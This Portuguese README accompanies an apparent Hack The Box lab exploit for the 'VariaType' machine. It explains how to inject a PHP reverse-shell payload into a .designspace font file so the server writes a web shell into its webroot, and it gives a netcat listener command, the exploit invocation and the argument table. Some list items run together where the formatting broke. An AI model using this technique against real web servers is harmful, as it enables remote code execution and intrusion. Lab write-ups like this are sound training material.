
Este repositório contém um exploit especializado para a máquina VariaType do Hack The Box. O exploit aproveita uma vulnerabilidade na forma como a biblioteca fontTools ou a aplicação web lida com arquivos XML .designspace e interpolação de metadados para alcançar Execução Remota de Código (RCE).
A vulnerabilidade existe no processo de geração de fontes. Ao criar um arquivo designspace malicioso, podemos injetar um payload de reverse shell PHP nos metadados da fonte (especificamente no campo <labelname>). Quando o servidor processa esses arquivos para gerar uma fonte variável, ele escreve a saída em um caminho definido pelo usuário, permitindo que coloquemos um shell .php na webroot.
source-light.ttf e source-regular.ttf válidas usando fontTools.designspace malicioso com um payload PHP encapsulado em CDATA..php no diretório público.Você deve ter Python 3 instalado juntamente com as seguintes bibliotecas:
pip install fontTools requests
Na sua máquina local (ou Pwnbox), inicie um listener Netcat:
nc -lvnp 4444
Execute o script fornecendo seu IP da VPN do HTB e a porta do listener:
python3 exploit.py --ip <YOUR_IP> --port 4444
Se o upload retornar 200 OK (ou às vezes até 500 se o processamento ocorrer antes do erro), o script fornecerá o nome do arquivo. Acesse-o via curl ou seu navegador:
curl http://portal.variatype.htb/shell_xxxxxx.php
Este script é destinado apenas para fins educacionais e testes de penetração autorizados. Acessar ou atacar alvos sem autorização prévia é ilegal.
README.md na mesma pasta do seu script.exploit.py ou atualize o nome do arquivo nos comandos acima.| Argumento | Descrição | Padrão |
|---|
--ip | Seu IP do listener (VPN) | Obrigatório |
--port | Sua porta do listener | Obrigatório |
--path | Caminho alvo para o shell | /var/www/portal.variatype.htb/public |
--url | O endpoint de upload | http://variatype.htb/tools/.../process |